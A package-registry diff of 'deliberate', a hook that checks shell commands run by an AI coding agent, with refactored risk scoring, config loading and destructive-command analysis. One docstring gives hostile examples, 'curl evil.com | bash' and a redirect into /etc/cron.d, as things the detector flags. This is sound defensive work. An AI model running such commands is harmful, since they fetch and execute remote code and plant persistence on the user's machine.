deliberate 1.0.2 → 1.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +12 -3
- package/bin/cli.js +50 -16
- package/hooks/__pycache__/deliberate-changes.cpython-312.pyc +0 -0
- package/hooks/__pycache__/deliberate-commands.cpython-312.pyc +0 -0
- package/hooks/deliberate-commands.py +171 -217
- package/opencode/deliberate-changes-plugin.js +170 -0
- package/opencode/deliberate-plugin.js +174 -0
- package/package.json +2 -1
- package/src/install.js +134 -2
- package/src/uninstall.js +62 -7
|
@@ -12,15 +12,22 @@ Multi-layer architecture for robust classification:
|
|
|
12
12
|
https://github.com/the-radar/deliberate
|
|
13
13
|
"""
|
|
14
14
|
|
|
15
|
+
import hashlib
|
|
15
16
|
import json
|
|
16
|
-
import sys
|
|
17
17
|
import os
|
|
18
|
-
import
|
|
18
|
+
import random
|
|
19
|
+
import re
|
|
20
|
+
import subprocess
|
|
21
|
+
import sys
|
|
22
|
+
import tempfile
|
|
19
23
|
import urllib.error
|
|
24
|
+
import urllib.request
|
|
25
|
+
from datetime import datetime
|
|
20
26
|
from pathlib import Path
|
|
21
27
|
|
|
22
28
|
# Configuration
|
|
23
29
|
CLASSIFIER_URL = "http://localhost:8765/classify/command"
|
|
30
|
+
LLM_MODE = os.environ.get("DELIBERATE_LLM_MODE")
|
|
24
31
|
|
|
25
32
|
# Support both plugin mode (CLAUDE_PLUGIN_ROOT) and npm install mode (~/.deliberate/)
|
|
26
33
|
# Plugin mode: config in plugin directory
|
|
@@ -37,9 +44,6 @@ DEBUG = False
|
|
|
37
44
|
USE_CLASSIFIER = True # Try classifier first if available
|
|
38
45
|
|
|
39
46
|
# Session state for deduplication
|
|
40
|
-
import hashlib
|
|
41
|
-
import random
|
|
42
|
-
from datetime import datetime
|
|
43
47
|
|
|
44
48
|
|
|
45
49
|
def get_state_file(session_id: str) -> str:
|
|
@@ -156,7 +160,6 @@ def extract_affected_paths(command: str) -> list:
|
|
|
156
160
|
|
|
157
161
|
Looks for paths in common destructive commands like rm, mv, cp, git rm, etc.
|
|
158
162
|
"""
|
|
159
|
-
import re
|
|
160
163
|
paths = []
|
|
161
164
|
|
|
162
165
|
# Patterns for extracting paths from various commands
|
|
@@ -222,6 +225,10 @@ def detect_workflow_patterns(history: dict, current_command: str, window_size: i
|
|
|
222
225
|
return detected
|
|
223
226
|
|
|
224
227
|
|
|
228
|
+
RISK_LEVELS = {"LOW": 0, "MODERATE": 1, "HIGH": 2, "CRITICAL": 3}
|
|
229
|
+
RISK_NAMES = {v: k for k, v in RISK_LEVELS.items()}
|
|
230
|
+
|
|
231
|
+
|
|
225
232
|
def calculate_cumulative_risk(history: dict, current_risk: str) -> str:
|
|
226
233
|
"""Calculate cumulative session risk based on history and current command.
|
|
227
234
|
|
|
@@ -230,36 +237,25 @@ def calculate_cumulative_risk(history: dict, current_risk: str) -> str:
|
|
|
230
237
|
- Detected workflow patterns
|
|
231
238
|
- Files at risk
|
|
232
239
|
"""
|
|
233
|
-
|
|
234
|
-
|
|
235
|
-
# Start with current command's risk
|
|
236
|
-
max_risk = risk_levels.get(current_risk, 1)
|
|
240
|
+
max_risk = RISK_LEVELS.get(current_risk, 1)
|
|
237
241
|
|
|
238
|
-
# Check historical risks
|
|
239
242
|
dangerous_count = 0
|
|
240
243
|
for cmd in history.get("commands", []):
|
|
241
244
|
cmd_risk = cmd.get("risk", "MODERATE")
|
|
242
245
|
if cmd_risk == "DANGEROUS":
|
|
243
246
|
dangerous_count += 1
|
|
244
|
-
max_risk = max(max_risk,
|
|
247
|
+
max_risk = max(max_risk, RISK_LEVELS.get(cmd_risk, 1))
|
|
245
248
|
|
|
246
|
-
# Escalate based on dangerous command count
|
|
247
|
-
if dangerous_count >= 3:
|
|
248
|
-
max_risk = max(max_risk, risk_levels["HIGH"])
|
|
249
249
|
if dangerous_count >= 5:
|
|
250
|
-
max_risk = max(max_risk,
|
|
250
|
+
max_risk = max(max_risk, RISK_LEVELS["CRITICAL"])
|
|
251
|
+
elif dangerous_count >= 3:
|
|
252
|
+
max_risk = max(max_risk, RISK_LEVELS["HIGH"])
|
|
251
253
|
|
|
252
|
-
# Check for detected patterns
|
|
253
254
|
for pattern in history.get("patterns_detected", []):
|
|
254
255
|
pattern_risk = pattern[1] if len(pattern) > 1 else "HIGH"
|
|
255
|
-
max_risk = max(max_risk,
|
|
256
|
+
max_risk = max(max_risk, RISK_LEVELS.get(pattern_risk, 2))
|
|
256
257
|
|
|
257
|
-
|
|
258
|
-
for name, level in risk_levels.items():
|
|
259
|
-
if level == max_risk:
|
|
260
|
-
return name
|
|
261
|
-
|
|
262
|
-
return "MODERATE"
|
|
258
|
+
return RISK_NAMES.get(max_risk, "MODERATE")
|
|
263
259
|
|
|
264
260
|
|
|
265
261
|
def get_destruction_consequences(command: str, cwd: str = ".") -> dict | None:
|
|
@@ -275,9 +271,6 @@ def get_destruction_consequences(command: str, cwd: str = ".") -> dict | None:
|
|
|
275
271
|
|
|
276
272
|
Returns None if command is not destructive or paths don't exist.
|
|
277
273
|
"""
|
|
278
|
-
import re
|
|
279
|
-
import subprocess
|
|
280
|
-
|
|
281
274
|
consequences = {
|
|
282
275
|
"files": [],
|
|
283
276
|
"dirs": [],
|
|
@@ -382,35 +375,19 @@ def _analyze_path(path: str, consequences: dict):
|
|
|
382
375
|
try:
|
|
383
376
|
if os.path.isfile(path):
|
|
384
377
|
consequences["files"].append(path)
|
|
385
|
-
size =
|
|
378
|
+
size, lines = _count_file_stats(path)
|
|
386
379
|
consequences["total_size"] += size
|
|
387
|
-
|
|
388
|
-
# Count lines for text files
|
|
389
|
-
if _is_text_file(path):
|
|
390
|
-
try:
|
|
391
|
-
with open(path, 'r', encoding='utf-8', errors='ignore') as f:
|
|
392
|
-
lines = sum(1 for _ in f)
|
|
393
|
-
consequences["total_lines"] += lines
|
|
394
|
-
except (IOError, PermissionError):
|
|
395
|
-
pass
|
|
380
|
+
consequences["total_lines"] += lines
|
|
396
381
|
|
|
397
382
|
elif os.path.isdir(path):
|
|
398
383
|
consequences["dirs"].append(path)
|
|
399
|
-
|
|
400
|
-
for root, _dirs, files in os.walk(path):
|
|
384
|
+
for root, _, files in os.walk(path):
|
|
401
385
|
for filename in files:
|
|
402
386
|
filepath = os.path.join(root, filename)
|
|
403
|
-
|
|
404
|
-
|
|
405
|
-
|
|
406
|
-
|
|
407
|
-
|
|
408
|
-
if _is_text_file(filepath):
|
|
409
|
-
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
|
|
410
|
-
lines = sum(1 for _ in f)
|
|
411
|
-
consequences["total_lines"] += lines
|
|
412
|
-
except (IOError, PermissionError, OSError):
|
|
413
|
-
pass
|
|
387
|
+
consequences["files"].append(filepath)
|
|
388
|
+
size, lines = _count_file_stats(filepath)
|
|
389
|
+
consequences["total_size"] += size
|
|
390
|
+
consequences["total_lines"] += lines
|
|
414
391
|
except (OSError, PermissionError):
|
|
415
392
|
pass
|
|
416
393
|
|
|
@@ -420,8 +397,6 @@ def _analyze_git_reset_hard(cwd: str, consequences: dict) -> dict | None:
|
|
|
420
397
|
|
|
421
398
|
Runs git diff HEAD to see uncommitted changes that will be lost.
|
|
422
399
|
"""
|
|
423
|
-
import subprocess
|
|
424
|
-
|
|
425
400
|
consequences["type"] = "git_reset_hard"
|
|
426
401
|
|
|
427
402
|
try:
|
|
@@ -453,15 +428,9 @@ def _analyze_git_reset_hard(cwd: str, consequences: dict) -> dict | None:
|
|
|
453
428
|
if status[0] in 'MA' or status[1] in 'MA':
|
|
454
429
|
consequences["files"].append(filepath)
|
|
455
430
|
if os.path.exists(full_path):
|
|
456
|
-
|
|
457
|
-
|
|
458
|
-
|
|
459
|
-
if _is_text_file(full_path):
|
|
460
|
-
with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
|
|
461
|
-
lines = sum(1 for _ in f)
|
|
462
|
-
consequences["total_lines"] += lines
|
|
463
|
-
except (IOError, OSError):
|
|
464
|
-
pass
|
|
431
|
+
size, lines = _count_file_stats(full_path)
|
|
432
|
+
consequences["total_size"] += size
|
|
433
|
+
consequences["total_lines"] += lines
|
|
465
434
|
|
|
466
435
|
# Get actual diff to show what changes will be lost
|
|
467
436
|
diff_result = subprocess.run(
|
|
@@ -503,8 +472,6 @@ def _analyze_git_clean(cwd: str, consequences: dict) -> dict | None:
|
|
|
503
472
|
|
|
504
473
|
Runs git clean -n (dry run) to preview what would be deleted.
|
|
505
474
|
"""
|
|
506
|
-
import subprocess
|
|
507
|
-
|
|
508
475
|
consequences["type"] = "git_clean"
|
|
509
476
|
|
|
510
477
|
try:
|
|
@@ -523,34 +490,27 @@ def _analyze_git_clean(cwd: str, consequences: dict) -> dict | None:
|
|
|
523
490
|
|
|
524
491
|
# Parse output: "Would remove path/to/file"
|
|
525
492
|
for line in clean_result.stdout.strip().split('\n'):
|
|
526
|
-
if line.startswith("Would remove "):
|
|
527
|
-
|
|
528
|
-
full_path = os.path.join(cwd, filepath)
|
|
493
|
+
if not line.startswith("Would remove "):
|
|
494
|
+
continue
|
|
529
495
|
|
|
530
|
-
|
|
531
|
-
|
|
532
|
-
|
|
533
|
-
|
|
534
|
-
|
|
535
|
-
|
|
536
|
-
|
|
537
|
-
|
|
538
|
-
|
|
539
|
-
|
|
540
|
-
|
|
541
|
-
|
|
542
|
-
|
|
543
|
-
|
|
544
|
-
|
|
545
|
-
|
|
546
|
-
|
|
547
|
-
|
|
548
|
-
consequences["total_size"] += os.path.getsize(full_path)
|
|
549
|
-
if _is_text_file(full_path):
|
|
550
|
-
with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
|
|
551
|
-
consequences["total_lines"] += sum(1 for _ in f)
|
|
552
|
-
except (IOError, OSError):
|
|
553
|
-
pass
|
|
496
|
+
filepath = line[len("Would remove "):].strip()
|
|
497
|
+
full_path = os.path.join(cwd, filepath)
|
|
498
|
+
|
|
499
|
+
if os.path.isdir(full_path):
|
|
500
|
+
consequences["dirs"].append(filepath)
|
|
501
|
+
for root, _, files in os.walk(full_path):
|
|
502
|
+
for filename in files:
|
|
503
|
+
fpath = os.path.join(root, filename)
|
|
504
|
+
consequences["files"].append(fpath)
|
|
505
|
+
size, lines = _count_file_stats(fpath)
|
|
506
|
+
consequences["total_size"] += size
|
|
507
|
+
consequences["total_lines"] += lines
|
|
508
|
+
else:
|
|
509
|
+
consequences["files"].append(filepath)
|
|
510
|
+
if os.path.exists(full_path):
|
|
511
|
+
size, lines = _count_file_stats(full_path)
|
|
512
|
+
consequences["total_size"] += size
|
|
513
|
+
consequences["total_lines"] += lines
|
|
554
514
|
|
|
555
515
|
if not consequences["files"] and not consequences["dirs"]:
|
|
556
516
|
return None
|
|
@@ -583,8 +543,6 @@ def _analyze_git_checkout_discard(cwd: str, consequences: dict) -> dict | None:
|
|
|
583
543
|
|
|
584
544
|
Shows modified tracked files that will lose their changes.
|
|
585
545
|
"""
|
|
586
|
-
import subprocess
|
|
587
|
-
|
|
588
546
|
consequences["type"] = "git_checkout_discard"
|
|
589
547
|
|
|
590
548
|
try:
|
|
@@ -609,13 +567,9 @@ def _analyze_git_checkout_discard(cwd: str, consequences: dict) -> dict | None:
|
|
|
609
567
|
full_path = os.path.join(cwd, filepath)
|
|
610
568
|
|
|
611
569
|
if os.path.exists(full_path):
|
|
612
|
-
|
|
613
|
-
|
|
614
|
-
|
|
615
|
-
with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
|
|
616
|
-
consequences["total_lines"] += sum(1 for _ in f)
|
|
617
|
-
except (IOError, OSError):
|
|
618
|
-
pass
|
|
570
|
+
size, lines = _count_file_stats(full_path)
|
|
571
|
+
consequences["total_size"] += size
|
|
572
|
+
consequences["total_lines"] += lines
|
|
619
573
|
|
|
620
574
|
if not consequences["files"]:
|
|
621
575
|
return None
|
|
@@ -651,9 +605,6 @@ def _analyze_git_stash_drop(cwd: str, command: str, consequences: dict) -> dict
|
|
|
651
605
|
|
|
652
606
|
Shows the content of the stash being dropped.
|
|
653
607
|
"""
|
|
654
|
-
import subprocess
|
|
655
|
-
import re
|
|
656
|
-
|
|
657
608
|
consequences["type"] = "git_stash_drop"
|
|
658
609
|
|
|
659
610
|
try:
|
|
@@ -703,20 +654,35 @@ def _analyze_git_stash_drop(cwd: str, command: str, consequences: dict) -> dict
|
|
|
703
654
|
return None
|
|
704
655
|
|
|
705
656
|
|
|
657
|
+
TEXT_EXTENSIONS = {
|
|
658
|
+
'.py', '.js', '.ts', '.tsx', '.jsx', '.json', '.yaml', '.yml',
|
|
659
|
+
'.md', '.txt', '.sh', '.bash', '.zsh', '.fish',
|
|
660
|
+
'.html', '.css', '.scss', '.sass', '.less',
|
|
661
|
+
'.java', '.kt', '.scala', '.go', '.rs', '.rb', '.php',
|
|
662
|
+
'.c', '.cpp', '.h', '.hpp', '.cs', '.swift', '.m',
|
|
663
|
+
'.sql', '.graphql', '.proto', '.xml', '.toml', '.ini', '.cfg',
|
|
664
|
+
'.env', '.gitignore', '.dockerignore', 'Makefile', 'Dockerfile',
|
|
665
|
+
'.vue', '.svelte', '.astro'
|
|
666
|
+
}
|
|
667
|
+
|
|
668
|
+
|
|
706
669
|
def _is_text_file(path: str) -> bool:
|
|
707
670
|
"""Check if file is likely a text/code file based on extension."""
|
|
708
|
-
text_extensions = {
|
|
709
|
-
'.py', '.js', '.ts', '.tsx', '.jsx', '.json', '.yaml', '.yml',
|
|
710
|
-
'.md', '.txt', '.sh', '.bash', '.zsh', '.fish',
|
|
711
|
-
'.html', '.css', '.scss', '.sass', '.less',
|
|
712
|
-
'.java', '.kt', '.scala', '.go', '.rs', '.rb', '.php',
|
|
713
|
-
'.c', '.cpp', '.h', '.hpp', '.cs', '.swift', '.m',
|
|
714
|
-
'.sql', '.graphql', '.proto', '.xml', '.toml', '.ini', '.cfg',
|
|
715
|
-
'.env', '.gitignore', '.dockerignore', 'Makefile', 'Dockerfile',
|
|
716
|
-
'.vue', '.svelte', '.astro'
|
|
717
|
-
}
|
|
718
671
|
_, ext = os.path.splitext(path)
|
|
719
|
-
return ext.lower() in
|
|
672
|
+
return ext.lower() in TEXT_EXTENSIONS or os.path.basename(path) in TEXT_EXTENSIONS
|
|
673
|
+
|
|
674
|
+
|
|
675
|
+
def _count_file_stats(filepath: str) -> tuple[int, int]:
|
|
676
|
+
"""Count size and lines for a file. Returns (size_bytes, line_count)."""
|
|
677
|
+
try:
|
|
678
|
+
size = os.path.getsize(filepath)
|
|
679
|
+
lines = 0
|
|
680
|
+
if _is_text_file(filepath):
|
|
681
|
+
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
|
|
682
|
+
lines = sum(1 for _ in f)
|
|
683
|
+
return size, lines
|
|
684
|
+
except (IOError, PermissionError, OSError):
|
|
685
|
+
return 0, 0
|
|
720
686
|
|
|
721
687
|
|
|
722
688
|
def get_backup_dir() -> str:
|
|
@@ -741,7 +707,6 @@ def create_pre_destruction_backup(
|
|
|
741
707
|
Returns backup path if successful, None if backup failed/skipped.
|
|
742
708
|
"""
|
|
743
709
|
import shutil
|
|
744
|
-
import subprocess
|
|
745
710
|
|
|
746
711
|
backup_base = get_backup_dir()
|
|
747
712
|
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
|
@@ -856,20 +821,12 @@ def create_pre_destruction_backup(
|
|
|
856
821
|
|
|
857
822
|
def load_backup_config() -> dict:
|
|
858
823
|
"""Load backup configuration from config file."""
|
|
859
|
-
|
|
860
|
-
|
|
861
|
-
|
|
862
|
-
|
|
863
|
-
|
|
864
|
-
|
|
865
|
-
return {
|
|
866
|
-
"enabled": backup.get("enabled", True), # Enabled by default
|
|
867
|
-
"maxBackups": backup.get("maxBackups", 50),
|
|
868
|
-
"riskThreshold": backup.get("riskThreshold", "CRITICAL") # Only backup for CRITICAL by default
|
|
869
|
-
}
|
|
870
|
-
except Exception:
|
|
871
|
-
pass
|
|
872
|
-
return {"enabled": True, "maxBackups": 50, "riskThreshold": "CRITICAL"}
|
|
824
|
+
backup = _load_config().get("backup", {})
|
|
825
|
+
return {
|
|
826
|
+
"enabled": backup.get("enabled", True),
|
|
827
|
+
"maxBackups": backup.get("maxBackups", 50),
|
|
828
|
+
"riskThreshold": backup.get("riskThreshold", "CRITICAL")
|
|
829
|
+
}
|
|
873
830
|
|
|
874
831
|
|
|
875
832
|
def add_command_to_history(session_id: str, command: str, risk: str, explanation: str):
|
|
@@ -949,34 +906,38 @@ def save_to_cache(session_id: str, cmd_hash: str, data: dict):
|
|
|
949
906
|
debug(f"Failed to cache: {e}")
|
|
950
907
|
|
|
951
908
|
|
|
952
|
-
|
|
953
|
-
|
|
909
|
+
_config_cache = None
|
|
910
|
+
|
|
911
|
+
|
|
912
|
+
def _load_config() -> dict:
|
|
913
|
+
"""Load config from CONFIG_FILE with simple caching."""
|
|
914
|
+
global _config_cache
|
|
915
|
+
if _config_cache is not None:
|
|
916
|
+
return _config_cache
|
|
954
917
|
try:
|
|
955
918
|
config_path = Path(CONFIG_FILE)
|
|
956
919
|
if config_path.exists():
|
|
957
920
|
with open(config_path, 'r', encoding='utf-8') as f:
|
|
958
|
-
|
|
959
|
-
|
|
960
|
-
return {
|
|
961
|
-
"enabled": blocking.get("enabled", False),
|
|
962
|
-
"confidenceThreshold": blocking.get("confidenceThreshold", 0.85)
|
|
963
|
-
}
|
|
921
|
+
_config_cache = json.load(f)
|
|
922
|
+
return _config_cache
|
|
964
923
|
except Exception:
|
|
965
924
|
pass
|
|
966
|
-
|
|
925
|
+
_config_cache = {}
|
|
926
|
+
return _config_cache
|
|
927
|
+
|
|
928
|
+
|
|
929
|
+
def load_blocking_config() -> dict:
|
|
930
|
+
"""Load blocking configuration from config file."""
|
|
931
|
+
blocking = _load_config().get("blocking", {})
|
|
932
|
+
return {
|
|
933
|
+
"enabled": blocking.get("enabled", False),
|
|
934
|
+
"confidenceThreshold": blocking.get("confidenceThreshold", 0.85)
|
|
935
|
+
}
|
|
967
936
|
|
|
968
937
|
|
|
969
938
|
def load_dedup_config() -> bool:
|
|
970
939
|
"""Load deduplication config - returns True if dedup is enabled (default)."""
|
|
971
|
-
|
|
972
|
-
config_path = Path(CONFIG_FILE)
|
|
973
|
-
if config_path.exists():
|
|
974
|
-
with open(config_path, 'r', encoding='utf-8') as f:
|
|
975
|
-
config = json.load(f)
|
|
976
|
-
return config.get("deduplication", {}).get("enabled", True)
|
|
977
|
-
except Exception:
|
|
978
|
-
pass
|
|
979
|
-
return True
|
|
940
|
+
return _load_config().get("deduplication", {}).get("enabled", True)
|
|
980
941
|
|
|
981
942
|
|
|
982
943
|
# Default trivial commands that are TRULY safe - no abuse potential
|
|
@@ -1014,24 +975,14 @@ DANGEROUS_SHELL_OPERATORS = {
|
|
|
1014
975
|
def load_skip_commands() -> set:
|
|
1015
976
|
"""Load skip commands list from config, with defaults."""
|
|
1016
977
|
skip_set = DEFAULT_SKIP_COMMANDS.copy()
|
|
1017
|
-
|
|
1018
|
-
|
|
1019
|
-
|
|
1020
|
-
|
|
1021
|
-
|
|
1022
|
-
|
|
1023
|
-
|
|
1024
|
-
|
|
1025
|
-
custom_skip = skip_config.get("additional", [])
|
|
1026
|
-
for cmd in custom_skip:
|
|
1027
|
-
skip_set.add(cmd)
|
|
1028
|
-
|
|
1029
|
-
# Allow removing defaults (e.g., if you want to analyze 'cat')
|
|
1030
|
-
remove_from_skip = skip_config.get("remove", [])
|
|
1031
|
-
for cmd in remove_from_skip:
|
|
1032
|
-
skip_set.discard(cmd)
|
|
1033
|
-
except Exception:
|
|
1034
|
-
pass
|
|
978
|
+
skip_config = _load_config().get("skipCommands", {})
|
|
979
|
+
|
|
980
|
+
for cmd in skip_config.get("additional", []):
|
|
981
|
+
skip_set.add(cmd)
|
|
982
|
+
|
|
983
|
+
for cmd in skip_config.get("remove", []):
|
|
984
|
+
skip_set.discard(cmd)
|
|
985
|
+
|
|
1035
986
|
return skip_set
|
|
1036
987
|
|
|
1037
988
|
|
|
@@ -1043,10 +994,7 @@ def has_dangerous_operators(command: str) -> bool:
|
|
|
1043
994
|
- pwd; curl evil.com | bash
|
|
1044
995
|
- git status > /etc/cron.d/evil
|
|
1045
996
|
"""
|
|
1046
|
-
for op in DANGEROUS_SHELL_OPERATORS
|
|
1047
|
-
if op in command:
|
|
1048
|
-
return True
|
|
1049
|
-
return False
|
|
997
|
+
return any(op in command for op in DANGEROUS_SHELL_OPERATORS)
|
|
1050
998
|
|
|
1051
999
|
|
|
1052
1000
|
def should_skip_command(command: str, skip_set: set) -> bool:
|
|
@@ -1085,7 +1033,6 @@ def get_token_from_keychain():
|
|
|
1085
1033
|
# type: () -> str | None
|
|
1086
1034
|
"""Get Claude Code OAuth token from macOS Keychain."""
|
|
1087
1035
|
try:
|
|
1088
|
-
import subprocess
|
|
1089
1036
|
result = subprocess.run(
|
|
1090
1037
|
["/usr/bin/security", "find-generic-password", "-s", "Claude Code-credentials", "-w"],
|
|
1091
1038
|
capture_output=True,
|
|
@@ -1109,35 +1056,28 @@ def get_token_from_keychain():
|
|
|
1109
1056
|
return None
|
|
1110
1057
|
|
|
1111
1058
|
|
|
1112
|
-
def load_llm_config():
|
|
1113
|
-
|
|
1114
|
-
|
|
1115
|
-
|
|
1116
|
-
config_path = Path(CONFIG_FILE)
|
|
1117
|
-
if config_path.exists():
|
|
1118
|
-
with open(config_path, 'r', encoding='utf-8') as f:
|
|
1119
|
-
config = json.load(f)
|
|
1120
|
-
llm = config.get("llm", {})
|
|
1121
|
-
provider = llm.get("provider")
|
|
1122
|
-
if not provider:
|
|
1123
|
-
return None
|
|
1059
|
+
def load_llm_config() -> dict | None:
|
|
1060
|
+
"""Load LLM configuration from config file or keychain."""
|
|
1061
|
+
if LLM_MODE == "manual":
|
|
1062
|
+
return None
|
|
1124
1063
|
|
|
1125
|
-
|
|
1126
|
-
|
|
1127
|
-
|
|
1128
|
-
|
|
1129
|
-
|
|
1130
|
-
|
|
1131
|
-
|
|
1132
|
-
|
|
1133
|
-
|
|
1134
|
-
|
|
1135
|
-
|
|
1136
|
-
|
|
1137
|
-
|
|
1138
|
-
|
|
1139
|
-
|
|
1140
|
-
|
|
1064
|
+
llm = _load_config().get("llm", {})
|
|
1065
|
+
provider = llm.get("provider")
|
|
1066
|
+
if not provider:
|
|
1067
|
+
return None
|
|
1068
|
+
|
|
1069
|
+
api_key = llm.get("apiKey")
|
|
1070
|
+
if provider == "claude-subscription":
|
|
1071
|
+
keychain_token = get_token_from_keychain()
|
|
1072
|
+
if keychain_token:
|
|
1073
|
+
api_key = keychain_token
|
|
1074
|
+
|
|
1075
|
+
return {
|
|
1076
|
+
"provider": provider,
|
|
1077
|
+
"base_url": llm.get("baseUrl"),
|
|
1078
|
+
"api_key": api_key,
|
|
1079
|
+
"model": llm.get("model")
|
|
1080
|
+
}
|
|
1141
1081
|
|
|
1142
1082
|
# Commands that are always safe (skip explanation) - fallback if classifier unavailable
|
|
1143
1083
|
SAFE_PREFIXES = [
|
|
@@ -1177,19 +1117,13 @@ def debug(msg):
|
|
|
1177
1117
|
def is_safe_command(command: str) -> bool:
|
|
1178
1118
|
"""Check if command is in the safe list (fallback)."""
|
|
1179
1119
|
cmd_lower = command.strip().lower()
|
|
1180
|
-
for prefix in SAFE_PREFIXES
|
|
1181
|
-
if cmd_lower.startswith(prefix.lower()):
|
|
1182
|
-
return True
|
|
1183
|
-
return False
|
|
1120
|
+
return any(cmd_lower.startswith(prefix.lower()) for prefix in SAFE_PREFIXES)
|
|
1184
1121
|
|
|
1185
1122
|
|
|
1186
1123
|
def is_dangerous_command(command: str) -> bool:
|
|
1187
1124
|
"""Check if command matches dangerous patterns (fallback)."""
|
|
1188
1125
|
cmd_lower = command.lower()
|
|
1189
|
-
for pattern in DANGEROUS_PATTERNS
|
|
1190
|
-
if pattern.lower() in cmd_lower:
|
|
1191
|
-
return True
|
|
1192
|
-
return False
|
|
1126
|
+
return any(pattern.lower() in cmd_lower for pattern in DANGEROUS_PATTERNS)
|
|
1193
1127
|
|
|
1194
1128
|
|
|
1195
1129
|
def call_classifier(command: str) -> dict | None:
|
|
@@ -1230,8 +1164,6 @@ def extract_script_content(command: str) -> str | None:
|
|
|
1230
1164
|
- source script.sh
|
|
1231
1165
|
- python script.py
|
|
1232
1166
|
"""
|
|
1233
|
-
import re
|
|
1234
|
-
|
|
1235
1167
|
# Common script execution patterns
|
|
1236
1168
|
patterns = [
|
|
1237
1169
|
# bash/sh/zsh execution
|
|
@@ -1279,8 +1211,6 @@ def extract_inline_content(command: str) -> str | None:
|
|
|
1279
1211
|
|
|
1280
1212
|
Returns the inline content if found, None otherwise.
|
|
1281
1213
|
"""
|
|
1282
|
-
import re
|
|
1283
|
-
|
|
1284
1214
|
# Heredoc patterns - capture content between << MARKER and MARKER
|
|
1285
1215
|
# Handles both << EOF and << 'EOF' (quoted prevents variable expansion)
|
|
1286
1216
|
heredoc_pattern = r'<<\s*[\'"]?(\w+)[\'"]?\s*\n(.*?)\n\1'
|
|
@@ -1334,6 +1264,7 @@ def extract_inline_content(command: str) -> str | None:
|
|
|
1334
1264
|
|
|
1335
1265
|
def call_llm_for_explanation(command: str, pre_classification: dict | None = None, script_content: str | None = None) -> dict | None:
|
|
1336
1266
|
"""Call the configured LLM to explain the command using Claude Agent SDK."""
|
|
1267
|
+
debug("call_llm_for_explanation started")
|
|
1337
1268
|
|
|
1338
1269
|
llm_config = load_llm_config()
|
|
1339
1270
|
if not llm_config:
|
|
@@ -1341,6 +1272,7 @@ def call_llm_for_explanation(command: str, pre_classification: dict | None = Non
|
|
|
1341
1272
|
return None
|
|
1342
1273
|
|
|
1343
1274
|
provider = llm_config["provider"]
|
|
1275
|
+
debug(f"LLM provider: {provider}")
|
|
1344
1276
|
|
|
1345
1277
|
# Only use SDK for claude-subscription provider
|
|
1346
1278
|
if provider != "claude-subscription":
|
|
@@ -1395,10 +1327,6 @@ RISK: [SAFE|MODERATE|DANGEROUS]
|
|
|
1395
1327
|
EXPLANATION: [your explanation including any security notes]"""
|
|
1396
1328
|
|
|
1397
1329
|
try:
|
|
1398
|
-
# Use Claude Agent SDK
|
|
1399
|
-
import subprocess
|
|
1400
|
-
import tempfile
|
|
1401
|
-
|
|
1402
1330
|
# Create temp file for SDK script
|
|
1403
1331
|
with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
|
|
1404
1332
|
sdk_script = f"""
|
|
@@ -1428,15 +1356,30 @@ async def main():
|
|
|
1428
1356
|
async with client:
|
|
1429
1357
|
await client.query(prompt)
|
|
1430
1358
|
|
|
1431
|
-
# Collect response
|
|
1359
|
+
# Collect response - check both AssistantMessage and ResultMessage
|
|
1432
1360
|
response_text = ""
|
|
1433
1361
|
async for msg in client.receive_response():
|
|
1434
1362
|
msg_type = type(msg).__name__
|
|
1435
|
-
|
|
1436
|
-
|
|
1363
|
+
|
|
1364
|
+
# Try to get text from AssistantMessage
|
|
1365
|
+
if msg_type == 'AssistantMessage' and hasattr(msg, 'content'):
|
|
1366
|
+
# content is a list of blocks (TextBlock, ToolUseBlock, etc.)
|
|
1367
|
+
for block in (msg.content or []):
|
|
1368
|
+
block_type = type(block).__name__
|
|
1369
|
+
if block_type == 'TextBlock' and hasattr(block, 'text') and block.text:
|
|
1370
|
+
# Accumulate text from all TextBlocks
|
|
1371
|
+
if response_text:
|
|
1372
|
+
response_text += "\\n" + block.text
|
|
1373
|
+
else:
|
|
1374
|
+
response_text = block.text
|
|
1375
|
+
|
|
1376
|
+
# ResultMessage marks the end
|
|
1377
|
+
if msg_type == 'ResultMessage':
|
|
1378
|
+
if hasattr(msg, 'result') and msg.result:
|
|
1379
|
+
response_text = msg.result
|
|
1437
1380
|
break
|
|
1438
1381
|
|
|
1439
|
-
print(response_text)
|
|
1382
|
+
print(response_text if response_text else "")
|
|
1440
1383
|
|
|
1441
1384
|
# Run async main
|
|
1442
1385
|
asyncio.run(main())
|
|
@@ -1445,6 +1388,7 @@ asyncio.run(main())
|
|
|
1445
1388
|
script_path = f.name
|
|
1446
1389
|
|
|
1447
1390
|
# Run SDK script
|
|
1391
|
+
debug("Running SDK script...")
|
|
1448
1392
|
result = subprocess.run(
|
|
1449
1393
|
["python3", script_path],
|
|
1450
1394
|
capture_output=True,
|
|
@@ -1454,11 +1398,14 @@ asyncio.run(main())
|
|
|
1454
1398
|
|
|
1455
1399
|
os.unlink(script_path)
|
|
1456
1400
|
|
|
1401
|
+
debug(f"SDK returncode: {result.returncode}")
|
|
1402
|
+
debug(f"SDK stderr: {result.stderr[:500] if result.stderr else 'none'}")
|
|
1457
1403
|
if result.returncode != 0:
|
|
1458
1404
|
debug(f"SDK script failed: {result.stderr}")
|
|
1459
1405
|
return None
|
|
1460
1406
|
|
|
1461
1407
|
content = result.stdout.strip()
|
|
1408
|
+
debug(f"SDK stdout (first 200 chars): {content[:200]}")
|
|
1462
1409
|
|
|
1463
1410
|
# Parse the response
|
|
1464
1411
|
risk = "MODERATE"
|
|
@@ -1602,6 +1549,13 @@ def main():
|
|
|
1602
1549
|
risk = llm_result["risk"]
|
|
1603
1550
|
explanation = llm_result["explanation"]
|
|
1604
1551
|
|
|
1552
|
+
# Guard against None/empty explanation - fall back to classifier reason or generic message
|
|
1553
|
+
if not explanation or explanation == "None":
|
|
1554
|
+
if classifier_result and classifier_result.get("reason"):
|
|
1555
|
+
explanation = classifier_result.get("reason")
|
|
1556
|
+
else:
|
|
1557
|
+
explanation = "Review command before proceeding"
|
|
1558
|
+
|
|
1605
1559
|
# NOTE: Deduplication is handled AFTER block/allow decision
|
|
1606
1560
|
